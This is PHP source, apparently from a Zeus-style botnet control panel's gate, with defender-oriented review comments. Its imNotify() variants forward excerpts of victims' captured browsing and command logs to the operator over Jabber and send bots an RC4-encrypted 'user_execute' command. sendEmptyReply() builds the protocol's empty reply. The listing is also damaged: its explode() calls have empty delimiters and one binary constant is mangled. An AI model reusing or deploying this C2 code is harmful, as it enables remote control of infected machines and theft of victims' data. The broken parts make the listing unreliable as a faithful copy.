/**
 * Gate-side notification hook: when a bot report matches one of the operator's
 * configured masks, this builds human-readable notices, logs them, pushes them
 * over Jabber via jabber_notify(), and — if a script is configured — answers the
 * reporting bot with an execute command and terminates the request.
 *
 * From a defender's viewpoint this is the path where a bot report turns into
 * (a) an outbound XMPP message to reports_jn_to and (b) a command reply carried
 * on the same HTTP response; both are observable on the network side.
 *
 * The reference parameters are only read here, never written.
 *
 * @param int    $type        report type, compared against the BLT_* constants
 * @param array  $list        report fields keyed by the SBCID_* constants
 * @param string $botId       identifier of the reporting bot
 * @param bool   $defloration presumably "first report from this bot" (name only — confirm against the caller)
 * @param bool   $wentOnline  presumably "bot just came online" (name only — confirm against the caller)
 * @return void               does not return at all on the script-reply path (die)
 */
function imNotify(&$type, &$list, &$botId, $defloration = false, $wentOnline = false)
{
    # No Jabber recipient configured: nothing to do.
    if (empty($GLOBALS['config']['reports_jn_to'])) {
        return;
    }
    $messages = array();
    # Notify of new matching BotIDs
    if ($defloration) {
        # NOTE(review): explode() rejects an empty delimiter (false + warning before
        # PHP 8, ValueError from 8.0); the real separator was most likely lost when
        # this listing was extracted. The other explode("") calls below share this.
        $ml = explode("", $GLOBALS['config']['reports_jn_botmasks']);
        foreach ($ml as $mask) {
            # Masks are glob-like: the mask is regex-quoted, '*' becomes '.*', the
            # pattern is anchored at both ends and matched case-insensitively.
            # The '@' hides a malformed-pattern warning, so a bad mask silently
            # never matches.
            if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) {
                $messages[] = "Reason: botId matched\nBot ID: {$botId}\n";
                break;
            }
        }
    }
    # Notify of matching BotIDs went online
    if ($wentOnline) {
        # Same glob-to-regex matching as above, against the 'wentOnline' mask list.
        $ml = explode("", $GLOBALS['config']['reports_jn_masks']['wentOnline']);
        foreach ($ml as $mask) {
            if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) {
                $messages[] = "Reason: botId is online\nBot ID: {$botId}\n";
                break;
            }
        }
    }
    # Notify of matching report URLs
    # Only HTTP/HTTPS request reports carry a source path worth matching.
    if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) {
        $ml = explode("", $GLOBALS['config']['reports_jn_list']);
        foreach ($ml as $mask) {
            if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) {
                # Only the first 1024 bytes of the captured log go into the notice.
                $messages[] = "Reason: URL matched\nBot ID: {$botId}\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024);
                break;
            }
        }
    }
    # Notify of matching report contexts by type
    # NOTE: these reports are not presented in full! Only some lines around the keyword
    if (!empty($list[SBCID_BOTLOG])) {
        # report type => [config mask-list key, reason text for the notice]
        $report_match = array(BLT_ANALYTICS_SOFTWARE => array('software', 'Software matched'), BLT_COMMANDLINE_RESULT => array('cmd', 'Command line result matched'));
        foreach ($report_match as $rm_type => $rm) {
            if ($type == $rm_type) {
                $ml = explode("", $GLOBALS['config']['reports_jn_masks'][$rm[0]]);
                $reason = $rm[1];
                # Trim each mask and drop empty ones before matching.
                foreach (array_filter(array_map('trim', $ml), 'strlen') as $mask) {
                    # Unanchored this time (substring search inside the log);
                    # PREG_OFFSET_CAPTURE gives the byte offset of the hit in $m[0][1].
                    if (@preg_match('#' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '#i', $list[SBCID_BOTLOG], $m, PREG_OFFSET_CAPTURE) > 0) {
                        # Extract a few lines around the match
                        $surrounding_lines = 2;
                        # byte offset of the match inside the log
                        $match_pos = $m[0][1];
                        # "\n" offsets retained so far; 0 seeds the start of the log
                        $n_pos = array(0);
                        # current search offset for strpos()
                        $p = 0;
                        # set once a newline beyond the match has been seen
                        $p_past_npos = false;
                        # Walk every "\n" in the log.
                        while (FALSE !== ($p = strpos($list[SBCID_BOTLOG], "\n", $p))) {
                            # all \n-s
                            $n_pos[] = $p;
                            # add it
                            if ($p > $match_pos) {
                                $p_past_npos = true;
                            }
                            # Before the match, keep only the last N+1 newline offsets
                            # so the excerpt starts at most N lines above the hit.
                            if (!$p_past_npos && count($n_pos) > $surrounding_lines + 1) {
                                # don't keep more than N \n-s
                                array_shift($n_pos);
                            }
                            # After the match, stop once (N+1)*2 offsets are held.
                            if ($p_past_npos && count($n_pos) >= ($surrounding_lines + 1) * 2) {
                                # stop a few lines past the match
                                break;
                            }
                            $p++;
                        }
                        # Excerpt spans from the first retained offset to the last one.
                        # NOTE(review): with fewer than two retained offsets array_pop()
                        # yields null and the excerpt comes out empty — existing quirk.
                        $p_from = array_shift($n_pos);
                        $p_till = array_pop($n_pos);
                        $message_part = trim(substr($list[SBCID_BOTLOG], $p_from, $p_till - $p_from));
                        $messages[] = "Reason: {$reason}\nBot ID: {$botId}\n\n" . $message_part;
                        break;
                    }
                }
            }
        }
    }
    # Notify
    if (empty($messages)) {
        return;
    }
    # Every notice is also written to the gate log at trace level under the
    # 'Jabber' tag — a useful artefact when reconstructing activity from a seized panel.
    foreach ($messages as $message) {
        GateLog::get()->log(GateLog::L_TRACE, 'Jabber', sprintf("Notify %s : %s", $GLOBALS['config']['reports_jn_to'], $message));
    }
    jabber_notify($GLOBALS['config']['reports_jn_to'], $messages);
    # Execute scripts, if set
    # $country_allowed is imported from the including script here; the reply is
    # only produced when it is truthy and a script path is configured.
    global $country_allowed;
    if ($country_allowed && strlen($GLOBALS['config']['reports_jn_script']) > 0) {
        # 16 raw bytes derived from microtime() serve as the item id.
        $eid = md5(microtime(), true);
        $script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f';
        $size = strlen($eid) + strlen($script);
        # Item: four machine-order uint32 (1, 0, size, size), then id, then the command text.
        $replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script;
        # Outer header: five mt_rand() values (not cryptographic randomness), the total
        # length HEADER_SIZE + body, 0, 1; followed by the raw md5 of the body.
        $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData;
        # Obfuscation layer first, then RC4 under the global key. Example #2 of this
        # listing keys RC4 from config 'botnet_cryptkey_bin' instead — different build, presumably.
        visualEncrypt($replyData);
        rc4($replyData, $GLOBALS['globalKey']);
        # The reply is written to the HTTP response and the request ends here.
        echo $replyData;
        die;
    }
}
/**
 * Older/alternate variant of the notification hook (compare example #1): only
 * HTTP/HTTPS request reports whose source URL matches a configured mask trigger
 * a notice. The notice is appended to a log file, sent as an XMPP message using
 * an inline Jabber client, and — when a script is configured — answered with an
 * execute command that terminates the request.
 *
 * Detection-relevant side effects: the log file named by reports_jn_logfile,
 * an outbound XMPP session to reports_jn_server:reports_jn_port, and the
 * command reply on the HTTP response.
 *
 * @param int    $type  report type, compared against the BLT_* constants
 * @param array  $list  report fields keyed by the SBCID_* constants
 * @param string $botId identifier of the reporting bot
 * @return void         does not return at all on the script-reply path (die)
 */
function imNotify(&$type, &$list, &$botId)
{
    if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) {
        # NOTE(review): explode() rejects an empty delimiter; the real separator was
        # most likely lost when this listing was extracted.
        $ml = explode("", $GLOBALS['config']['reports_jn_list']);
        # Iterates by reference but never unset()s $mask afterwards — a dangling
        # reference into $ml survives the loop (classic PHP foreach pitfall).
        foreach ($ml as &$mask) {
            # Glob-like mask: regex-quoted, '*' -> '.*', anchored, case-insensitive;
            # '@' hides a malformed-pattern warning so a bad mask never matches.
            if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) {
                # Entity-encoded notice with at most 1024 bytes of the captured log.
                $message = htmlentities("Bot ID: " . $botId . "\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024));
                # Silences all PHP errors for the remainder of the request, not just this block.
                error_reporting(0);
                # Append the notice to the configured log file, separated by a rule of '='.
                if (strlen($GLOBALS['config']['reports_jn_logfile']) > 0 && ($fh = @fopen($GLOBALS['config']['reports_jn_logfile'], 'at')) !== false) {
                    @fwrite($fh, $message . "\n\n" . str_repeat('=', 40) . "\n\n");
                    @fclose($fh);
                }
                # Inline XMPP client: connect, authenticate, announce presence, send one
                # "normal" message to the configured recipient, disconnect.
                require_once "system/jabberclass.php";
                $jab = new Jabber();
                $jab->server = $GLOBALS['config']['reports_jn_server'];
                $jab->port = $GLOBALS['config']['reports_jn_port'];
                $jab->username = $GLOBALS['config']['reports_jn_account'];
                $jab->password = $GLOBALS['config']['reports_jn_pass'];
                if ($jab->connect()) {
                    $jab->sendAuth();
                    $jab->sendPresence(NULL, NULL, "online");
                    $jab->sendMessage($GLOBALS['config']['reports_jn_to'], "normal", NULL, array("body" => $message));
                    $jab->disconnect();
                }
                if (strlen($GLOBALS['config']['reports_jn_script']) > 0) {
                    # Item id is the raw md5 of the matched mask — deterministic, unlike
                    # the microtime()-derived id in example #1.
                    $eid = md5($mask, true);
                    $script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f';
                    $size = strlen($eid) + strlen($script);
                    # Item: four machine-order uint32 (1, 0, size, size), then id, then command text.
                    $replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script;
                    # Outer header: five mt_rand() values (not cryptographic randomness), total
                    # length HEADER_SIZE + body, 0, 1; followed by the raw md5 of the body.
                    $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData;
                    # Obfuscation layer, then RC4 under the key from config.
                    visualEncrypt($replyData);
                    rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']);
                    # Written to the HTTP response; the request ends here.
                    echo $replyData;
                    die;
                }
                break;
            }
        }
    }
}
/**
 * Writes a minimal "nothing for you" reply to the HTTP response and terminates
 * the request. The header follows the same layout as the command replies above:
 * five mt_rand() values (not cryptographic randomness), the total length
 * HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1, followed by a fixed byte string.
 *
 * NOTE(review): the trailing literal is binary data that has been mangled by
 * character encoding on this page; its original bytes cannot be recovered from
 * here, so this listing must not be treated as a faithful copy of that constant.
 *
 * @return never terminates via die after echoing the reply
 */
function sendEmptyReply()
{
    $replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1) . "J�6�K��y�u.#H�";
    # Obfuscation layer, then RC4 under the key from config — same as the command replies.
    visualEncrypt($replyData);
    rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']);
    echo $replyData;
    die;
}